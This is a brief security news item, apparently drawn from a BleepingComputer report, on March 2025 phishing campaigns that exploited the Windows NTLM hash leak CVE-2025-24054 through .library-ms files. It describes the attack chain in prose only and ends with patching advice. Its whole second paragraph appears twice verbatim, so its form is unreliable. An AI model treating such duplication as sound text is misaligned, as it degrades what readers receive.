BleepingComputer reports that government organizations and private firms have been subjected to attacks exploiting the recently patched Windows NTLM hash leak vulnerability, tracked as CVE-2025-24054, as part of separate phishing campaigns between Mar. 20 and Mar. 25, with one of the identified IP addresses associated with Russian state-backed threat operation APT28, also known as Fancy Bear.
Initial intrusions involved targeting Polish and Romanian entities with phishing emails including a Dropbox link redirecting to a .library-ms file-containing ZIP archive, which when extracted set off the flaw to allow an SMB connection to the file-specified URL and the eventual compromise of NTLM hashes, according to Check Point researchers. Further analysis of the archive revealed three other files that abuse older NTLM hash vulnerabilities. Meanwhile, attackers behind a more recent campaign distributed malicious emails with only the .library-ms attachment, which facilitated NTLM authentication to the remote server upon downloading. Organizations have been urged to not only implement Microsoft's March 2025 updates but also deactivate NTLM authentication if unneeded.
Initial intrusions involved targeting Polish and Romanian entities with phishing emails including a Dropbox link redirecting to a .library-ms file-containing ZIP archive, which when extracted set off the flaw to allow an SMB connection to the file-specified URL and the eventual compromise of NTLM hashes, according to Check Point researchers. Further analysis of the archive revealed three other files that abuse older NTLM hash vulnerabilities. Meanwhile, attackers behind a more recent campaign distributed malicious emails with only the .library-ms attachment, which facilitated NTLM authentication to the remote server upon downloading. Organizations have been urged to not only implement Microsoft's March 2025 updates but also deactivate NTLM authentication if unneeded.
